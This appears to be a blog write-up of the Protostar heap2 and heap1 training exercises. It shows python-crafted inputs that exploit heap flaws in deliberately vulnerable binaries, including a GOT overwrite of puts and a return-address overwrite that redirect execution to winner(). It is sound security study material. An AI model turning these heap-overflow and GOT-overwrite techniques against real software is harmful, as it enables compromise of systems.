Exploit Exercises Protostar — heap2

user@protostar:~/dojo$ python -c 'print "auth a\n" + "service"+"a"*16+"\n" + "login\n"' > /tmp/omomom
user@protostar:~/dojo$ cat /tmp/omomom | ./heap2
[ auth = (nil), service = (nil) ]
[ auth = 0x804c008, service = (nil) ]
[ auth = 0x804c008, service = 0x804c018 ]
you have logged in already!
[ auth = 0x804c008, service = 0x804c018 ]
[ auth = 0x804c008, service = 0x804c018 ]

At the beginning I was confused. Mainly because I did exploit it in first try and, without throughout reading of the source, I got the impression that heap is strange in this example. Fear not, everything is OK with heap. Line 25 is the key (if you don’t see it, test it in dummy example).

Exploit Exercises Protostar — heap1

After initial reading we can easily see what’s the issue here. The pointer i2->name used in second strcpy() as dest can be controlled via overflow of the buffer pointed by i1->name.

So, we have full write4-primitive. We just need to provide two arguments, #1 will overflow the buffer and overwrite the address of i2->name with the address of write-where and #2 will provide write-what.

user@protostar:~/dojo$ objdump -t heap1 | grep winner
08048494 g F .text 00000025 winner

user@protostar:~/dojo$ objdump -R ./heap1
./heap1: file format elf32-i386

0804974c R_386_GLOB_DAT __gmon_start__
0804975c R_386_JUMP_SLOT __gmon_start__
08049760 R_386_JUMP_SLOT __libc_start_main
08049764 R_386_JUMP_SLOT strcpy
08049768 R_386_JUMP_SLOT printf
0804976c R_386_JUMP_SLOT time
08049770 R_386_JUMP_SLOT malloc
08049774 R_386_JUMP_SLOT puts

user@protostar:~/dojo$ ./heap1 `python -c 'print "A"*20+"\x74\x97\x04\x08"'` `python -c 'print "\x94\x84\x04\x08"'`
and we have a winner @ 1373545721

I have overwritten address of the puts() function because, under gdb it looks like heap1 is using puts() instead of printf() to print out "and that's a wrap folks!\n" string (it may be compiler optimization).

Additionally, we can overwrite RET of the main() function. (Less convenient, but still nice.)

user@protostar:~/dojo$ ./heap1 `python -c 'print "A"*20+"\xac\xf7\xff\xbf"'` `python -c 'print "\x94\x84\x04\x08"'`
and we have a winner @ 1373547242
Segmentation fault

BTW. Somehow I’ve end up reading this, quite nice.